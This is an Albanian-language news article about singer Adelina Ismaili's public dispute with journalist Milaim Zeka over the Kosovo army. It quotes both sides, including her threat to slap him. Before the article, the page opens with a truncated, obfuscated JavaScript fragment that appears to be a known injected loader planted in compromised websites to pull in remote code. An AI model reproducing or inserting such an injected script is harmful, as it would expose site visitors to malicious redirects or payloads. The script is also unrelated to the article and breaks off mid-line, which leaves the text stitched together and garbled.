;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Eskalon debati, Adelina: ‘Kam me t’rreh bre shpulla gojës me dy duart e mia’

By

Këngëtarja Adelina Ismaili befasoi jo pak ditën e djeshme kur zgjodhi të merret me Milaim Zekën e Berat Buzhalën mbi temën e ushtrisë së Kosovës.

Siç vepron rrallë ajo iu rikujtoi të apostrofuarve dhe publikut që i ka kënduar ushtrisë dhe ka përkrahur UÇK-në qysh si adoleshente në vitin 1996 kur të tjerë s’kishin guxim të veprojnë njejtë.

E sot, erdhi një replikë nga gazetari Zeka i cili akuzoi se këngëtarja është mbrojtur me urdhër direkt nga shefi i shërbimit sekret të Millosheviqit.

“Unë për veten time pavarësisht se çka ka fol Adelina e ruaj konsideratën dhe miqësinë. Dëshiroj që t’i përgjigjem asaj në dy gjëra që na kishte mbajtë nën fustan mu e Berat Buzhalën, e sa i përket fustanit na i ishim hy vetë dhe nuk kishim prit ajo me na majt, ndërsa sa i përket tjetrës ku ka thënë që me m’pasë mbrojtë kur ka këndu ajo që gjoja na jena kon frikacak  dhe nuk e kemi mbrojtë, dua t’ia kujtoj asaj se e kam mbrojtë në një rast Adelinën gjatë luftës, ajo e din një rast kur e ka pas jetën në rrezik e kam mbrojtur dhe e dyta sa i përket mbrojtjes nga policia serbe Adelina e din që kur ka qenë në Beograd, pse e ka qu në Beograd Sali Banana atë dhe nënën e vetë, dmth ajo ka kërku mbrojtje në Beograd direkt prej shefit të shërbimit sekret të Millosheviqit, kështu që unë edhe Berati s’kemi pas pse më mbrojtë sepse ajo ka pas mbrojtje direkte prej Stanishiqit”, tha Zeka të martën për Express.

Kjo ka bërë që Ismaili të reagoj sërish në një postim që të plotë ua sjellim më poshtë:

E fundit per ty Milaim dhe Milaimat tjerë…Nuk jeni kaq të “sertë” kur po takohemi, po nejse. Akuzat që mi keni bërë që nga fëmijëria mua vetëm më kanë forcuar. Deri sa jam bërë imune dhe nuk më bëni më asnjë përshtypje. Keni fat që kurr nuk iu kam marr seriozisht, as une dhe as ky popull. Kur edhe Adem Jasharin e keni akuzuar, çka të them une?! Sa i përket ushtrisë: Po, do të bëhet! Dhe do të bëhet pikërisht nga LDK. Siq ju kam thënë me këngë prej vitit 1995. Të pëlqeu ty dhe tjerëve si ti, apo jo. Nese ndonjëherë kam pas mbrojtje, e kam pas vetëm nga Ibrahim Rugova dhe këta fansa të mi. Ai Rugova të cilit as nuk ju keni afru as nuk do të arrini me iu afru deri te këmba. Dhe sa të jem gjallë do t’ia këndoj këngën, për të cilën personalisht më është falenderuar. Sikur ky popull, që kurr nuk harruan cila është kënga e parë për ushtrinë…
Ti e din që kurr nuk do të reagoja. Por ti nënën e vdekur ma ofendove. Pa i bërë ende nje vit që e kam varros, pa më dhënë rast ti falenderoj ata që më ngushëlluan… Kam me t’rreh bre shpulla gojës me dy duart e mia ne momentin që takohem me ty! Mandej kthjellesh kush jam,se si duket tu kanë ngatërruar ty. Edhe e fiton një storie ekskluzive për Adelinën, me fitu pare e like. A bon me chill tash? A.I.

Artikuj të ngjashëm